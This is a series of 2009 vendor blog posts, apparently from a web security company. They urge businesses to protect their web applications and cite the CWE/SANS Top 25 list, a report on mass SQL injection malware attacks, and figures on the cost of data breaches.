Submitted by Sanjay Mehta 3/11/09key-30

Web applications are the backbone of your businesses! But like all backbones, if you don’t take care of them they tend to become frail, poor performing, and vulnerable to injury over time.

Unfortunately the difficulty in monitoring and maintaining the health and security of web applications isn’t as simple as a daily dose of calcium. The benefits associated with your web applications can quickly unravel if the integrity of the web applications becomes compromised. Defects in web applications can lead to: lost revenue and customers, damaged reputation and brand, code leakage, and compliance violations. This isn’t to say you should give up now – instead implement a focused program to identify possible defects and vulnerabilities that lie in your web applications and take steps to remediate.

Here are some “must do” steps to maintain the integrity and security of your web applications:

  • Stay current: Web applications and threats are continuously changing – you need a solution that is adaptive and is able to continuously monitor.
  • Defense-in-depth, not just for networks anymore: Web applications need to be monitored through all steps in Development, QA, Staging, Production.
  • The “response” matters: For a complete picture on the health of your web applications you need full outbound inspection and correlation.
  • Compliance is a goal: Good security leads to compliance but compliance programs should not lead to better security.
  • You cannot improve what you don’t understand: Foster an environment for application security and integrity by bridging the gap between your security and development teams.
  • Find the right security partner!

Remember simple defects can result in serious problems.

Submitted by Sanjay Mehta 1/13/2009simplify

Sometimes the simplest mistakes can cause great harm, and if you want proof, take a look at today’s web based business applications.  On January 12, 2009, CWE & SANS announced the Top 25 Most Dangerous Programming Errors. This list assembled from more than 30 US and international security organizations will revolutionize the way businesses maintain their web applications integrity and the way people are trained to write secure code.

This priority list helps all businesses, both large and small, take better control of their application security. Many enterprise corporations I visit have a hard time keeping up with the changes in a dynamic application environment, let along how those changes might introduce new security vulnerability or application integrity concerns.  But now, thanks to these industry experts, including Breach Security Labs leader Ryan Barnett, an understanding of the threat of security bugs, cyber espionage, and cyber crime has been simplified into a list of common programming errors. Thus, making it easier for developers to write code that will mitigate or eliminate the weakness in business applications.
This project is another great step forward in creating a more secure Internet.

New SQL Injection Attack Unleashed in 2008

Submitted by Darryl Gordon 2/24/09whid2008wp

Our recently released Web Hacking Incidents Database (WHID) 2008 Annual Report found that a new type of SQL injection attack successfully compromised more than 500,000 web sites in 2008. Was your web site one of them? The report confirmed that the web application security landscape continued to evolve last year with SQL injection attacks that plant malware on target web sites ranking as the #1 security attack for online criminals last year.

For most of you, protecting your customers is of the utmost concern. Breach’s WHID report noted a shift in attack methods as hackers focused more on a web site’s large customer base in 2008 instead of targeting sensitive information within the web site’s database. Unfortunately, this attack method turns a web site into a malware launching point when legitimate users visit your site.

It’s simply not enough to complete the occasional code review or vulnerability scan. Today’s companies need to know where the threat or defect is, and know that they’re protected. To download a copy of the WHID report, please visit www.breach.com/2008WHID.

Submitted by Sanjay Mehta 1/6/2009sky-diving-cartoon

Would you jump out of a plane without a parachute?  This might be a silly question for most of you (except for the one or two crazy daredevils reading this blog), but I’m assuming most of you would not leap out of a plane to a most certain death.  I believe that businesses that are deciding to leave their web applications unprotected will be facing the same type of risk, but instead of facing certain death they risk closing the doors to their business.

The amount of data leakage and data theft continues to soar (check out some of the latest web attacks at this website: http://www.breachblog.com) and the media has pounced on the chance to expose these attacks as they surface.  As a result, businesses must tighten up their defenses and web applications are a major hole in most security strategies.  Although most businesses realize the risk of not having well protected web applications many still wonder if it is worth the money to invest in web application security?  The short answer is yes!! But, just in case you don’t want to take just my word for it, I included a few statistics regarding the business costs associated with not protecting web applications.      

  • In 2006, companies spent $5 million on average and up to $22 million to recover from corporate data loss.
    • Per capita cost of a data breach in 2006 was up 31% from 2005.
    • Cost of notification is $125/customer.
  • 25% of customers who receive notification will leave you, and another 20% are likely to leave (Potential result – 45% total customer loss).
  • Security breaches cost $90 to $305 per lost record.
  • Companies spend $180,000 on average after a breach to prevent further breaches.

The relatively small investment of protecting a businesses’ web applications is trivial compared to the costs of leaving web applications unprotected. Businesses that do suffer a web attack not only suffer immediate monetary set backs, but their reputation and brand may be forever damaged.  The good thing is that the web application security industry continues to evolve and continues to produce new affordable solutions to keep you ahead of the hackers.  Please don’t jump out of any planes without parachutes and please don’t leave your web applications unprotected.